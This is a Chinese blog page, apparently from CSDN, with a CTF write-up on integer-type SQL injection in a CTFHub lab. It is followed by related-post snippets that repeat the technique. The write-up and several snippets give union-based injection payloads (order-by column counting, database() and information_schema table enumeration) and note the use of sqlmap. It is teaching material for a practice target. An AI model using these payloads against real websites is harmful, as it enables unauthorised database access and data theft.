CTFHub_SQL整数型注入(超详解)

最新推荐文章于 2024-06-07 08:30:00 发布
最新推荐文章于 2024-06-07 08:30:00 发布
阅读量1k 收藏 15
点赞数 2
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47443077/article/details/119104865
版权
本文详述了如何利用CTFHub进行SQL整数型注入的步骤,从确定字段数到成功获取flag,包括判断显示位、查看数据库、获取表名和字段信息,最后使用sqlmap工具验证并提取关键数据。
摘要由CSDN通过智能技术生成

CTFHub_SQL整数型注入(超详解)

相信这个过程会帮助你理解sql注入!

首先打开环境

image-20210726094820985

先尝试手注,已经说明是整数型,就直接查看字段数:

1 order by 1# 
1 order by 2# 
1 order by 3#

发现在第三步的时候没有回显,说明字段数是2。

接着判断显示位:

-1 union select 1,2#

image-20210726095429952

然后查看数据库:

-1 union select database(),2#

image-20210726095542128

接着获取sqli数据库中的表:

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

最低0.47元/天 解锁文章
独角授
关注
  • 2
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
SQL 整数形注入
MZa1213123的博客
03-02 2664
CTFHub SQL 整数型注入 先 and 1=1 有回显 接着 and 1=2 无回显也就错误页面 判断有 SQL 注入 order by x 爆出几个字段 order by 3 无回显 证明只有两个字段 union 联合查询 常用函数 user() database() session_usr() @@version @@basedir @@datadir @@version_compile_os 得到数据库名后 接着继续爆出该数据库的表名(奇怪.
SQL_Server_DBA工作内容详解
07-23
资源名称:SQL_Server_DBA工作内容详解资源截图: 资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
CTFHub - 整数型注入
Have_a_great_day的博客
09-07 454
欢迎各位师傅以kill -9 的威力对文章进行检查,Zeus会认真分析听取各位师傅的留言。
CTFHUB-SQL注入-整数型注入
最新发布
weixin_68416970的博客
06-07 578
根据题目描述输入 1 进行测试,发现此题可能存在 SQL 注入漏洞。使用 id=1' and 1 = 1 和 id=1' and 1 = 2’进行判断,此题存在 SQL 整数型漏洞注入。然后第一步先判断字段数量,然后查看数据库名,接着查看全部数据库名,查看这些数据库的表名,发现一个表名为 flag。查看这个表的全部字段后接着查看表中的数据得到此题 flag。
CTFHUB——整数型SQL注入
陈艺秋的博客
01-14 1310
整型SQL注入
CTFHub-sql注入-整数型注入
qq_54537919的博客
07-22 906
CTFHub-sql注入-整数型注入
CTFHub 整数型SQL注入
Leon~博客
03-08 5682
1、整数型SQL注入 (1)判断是否存在注入 1)加单引号 URL:http://challenge-4334fe95b292f4f7.sandbox.ctfhub.com:10080/?id=1’ 对应的sql:select * from table where id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,就会抛出异常; 2)加and 1=1 URL:http:...
CTFHUB-整数型SQL注入
xixihahawuwu的博客
12-24 4397
CTFHUB-整数型SQL注入 根据提示输入1后发现页面回显并且url改变。由题可知此题为整数型注入 使用order by语句查询字段数 参数为3时不回显,说明字段数为2 使用union联合查询检测信息回显位置 id=1 union select 1,2 由于页面只允许返回一行内容,所以我们修改参数1为-1,使需要查询的信息回返 id=-1 union select 1,2 id=-1 union select 1,database() 获取当前数据库名 id=-1 union select 1,
SQL_zhuru.rar_sql 注入_sql注入
09-24
在"SQL_zhuru.rar_sql注入_sql注入"这个压缩包中,可能包含了关于如何识别、预防和应对SQL注入攻击的相关资料。 在"www.pudn.com.txt"文件中,可能包含了从Pudn网站下载的关于SQL注入的技术文章、教程或案例分析。...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页...
ASP_ACCESS_SQL_Injection_Test.rar_sql注入_tool
09-20
ASP_ACCESS_SQL_Injection_Test 是一个专门针对ASP(Active Server Pages)和ACCESS数据库的SQL注入测试工具。这个压缩包包含了两个文本文件和一个可执行程序,用于帮助开发者或安全研究人员检测和预防SQL注入漏洞。...
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
Ctfhub-sql注入整数型
soysauce123的博客
08-03 1023
这样我们就很清楚一个库的库名,表名和字段名就可以直接查找里面的数据。先尝试看看一共有几列,当道三的时候发现不返回了说明只有两列。发现有老多库了,我们就大胆猜测从我们本来就在的库里面查找。于是使用函数获得此表里面的带有flag的字段名。小白承认这题对于我来说是一个练手的题目【嘿嘿】身为一名小白我们先预习一下今天要用到的知识。接下来就可以查询一下我们现在在什么库。我们肯定要的是flag里面的数据对吧。然后我们就可以输入flag通过本题啦。然后我们再尝试看看一共有什么库用到。欸,发现我们在sqli里面。.....
CTFHUB - SQL注入-整数型和字符型注入
m0_64180167的博客
11-28 2341
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
CTFHub SQL注入 整数型注入
weixin_44732566的博客
02-12 3748
CTFHub SQL注入 整数型注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
ctfhubsql整数型注入
hyhyxyx的博客
07-25 276
在1后加一个’ 无回显输入id=1 and 1=1 出现回显将1=1变为1=2—》语句正确但是无法访问数据库(图三)【可判定此处有整数注入漏洞】
ctfhub SQL 整数型注入
qq_52671379的博客
06-21 329
SQL 整数型注入 题目 当输入值为1或2时有回显 当输入3时无回显 判断是否存在注入 加单引号 对应的id=3’ 这时sql语句出错,程序无法正常从数据库中查询出数据,无回显。 作为sql注入的小白,我决定不采用大佬们的方法,看不懂,先分享自己的方法,非常传统。 由以上得知有两个字段,所以第一步,爆库名; '' union select 1,database() # 第二,爆表名; '' union select 1,group_concat(table_name) from information_
ctfhub Sql整数型注入
m0_64078007的博客
03-11 246
我们打开文件发现了它提示我们输入一个“1”,我们尝试输入。 我们发现它可以有回显,根据它的提示我们尝试整数的注入类型。 select * from news where id = 1 and 1=1 select * from news where id = 1 and 1=2 当我们尝试到第三个时,它爆字段了。 ...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值